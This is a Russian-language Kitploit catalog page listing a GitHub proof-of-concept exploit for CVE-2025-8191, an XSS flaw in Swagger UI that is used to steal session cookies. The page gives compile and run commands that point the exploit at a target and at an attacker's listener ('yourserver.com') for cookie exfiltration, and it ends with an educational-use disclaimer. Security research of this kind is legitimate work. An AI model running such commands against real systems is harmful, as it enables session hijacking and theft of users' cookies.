Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-8191 — Репозиторий, содержащий эксплойт PoC для CVE‑2025‑8191 в Swagger UI, использующий XSS-инъекцию для извлечения сессионных cookie. | Kitploit
Инструменты/GitHubGitHub/bytereaper77/cve-2025-8191
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеОбучение и ОбразованиеArchived
GitHubbytereaper77/cve-2025-8191

CVE-2025-8191

Репозиторий, содержащий эксплойт PoC для CVE‑2025‑8191 в Swagger UI, использующий XSS-инъекцию для извлечения сессионных cookie.

Репозиторий
211 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-8191 – XSS-инъекция в Swagger UI

Описание:

Этот репозиторий содержит Proof‑of‑Concept (PoC) эксплойт для CVE‑2025‑8191 — уязвимости, обнаруженной в Swagger UI.

Уязвимость позволяет внедрение межсайтового скриптинга (XSS) в поле «description», что приводит к удаленному выполнению скриптов в версиях Swagger UI ≤ 1.0.3.

Ссылки:

  • Запись NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-8191

Использование:

root@kitploit:~
gcc exploit.c argparse.c -o exploit -lcurl
./exploit -u http://target.com -s http://yourserver.com -v 

Замените http://target.com на URL целевого Swagger UI, а http://yourserver.com — на ваш HTTP-слушатель для эксфильтрации.

Отказ от ответственности:

Этот код предназначен только для образовательных целей и исследований в области безопасности. НЕ ИСПОЛЬЗУЙТЕ его на системах, на которые у вас нет явного разрешения. Автор не несет ответственности за любое неправомерное использование.

Лицензия:

Лицензия MIT

Скачать инструмент